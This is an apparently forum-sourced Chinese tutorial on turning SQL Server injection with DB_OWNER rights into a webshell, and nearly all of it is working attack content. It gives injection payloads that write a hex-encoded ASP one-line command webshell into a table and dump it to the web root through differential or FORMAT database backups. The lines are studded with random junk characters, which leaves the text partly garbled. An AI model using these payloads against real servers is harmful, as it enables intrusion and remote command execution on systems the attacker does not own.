DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

: h* x6 t$ ]. D减少备份文件大小，得到可执行的webshell成功率提高不少
( A1 m8 B$ g7 s* x- B" I) |- ]一利用差异备份
) A# t+ r, `0 |& a+ b& l加一个参数WITH DIFFERENTIAL

9 h% E. z) T+ n/ g* ]6 ?1
' F' N) f% N- @, B# m2
: A5 n5 J$ K/ J7 u3
8 [# q9 Q3 D7 H4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 {/ z9 ]2 B, dcreate table [dbo].[xiaolu] ([cmd] [image]);
; ^6 J1 L) t" D$ B; s8 t; p+ v6 S, Pinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
9 W1 j% }$ q4 [. Q" E( H2 O
二利用完全FORMAT
) H) ?: @- E' b& x加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

# x) W5 b1 `, B4 R  y1 h: R- t1
2
3
4
2 s' I5 `# q  N( {8 j declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
5 _: i8 ^8 O2 Z8 Screate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
, j  F1 D" W1 Cdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
$ J! G8 J* f6 c1 T$ o; K5 r7 @
总的来说就是那么简单几句,下面以备份数据库model为例子
1

1
; d& a- _  w9 g, R% w id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
: \0 u  X/ H4 |% @+ C$ G' p$ b
2
  r8 l8 O. [) a
1
id=1;backup database model to disk='你的路径‘ with differential,format;--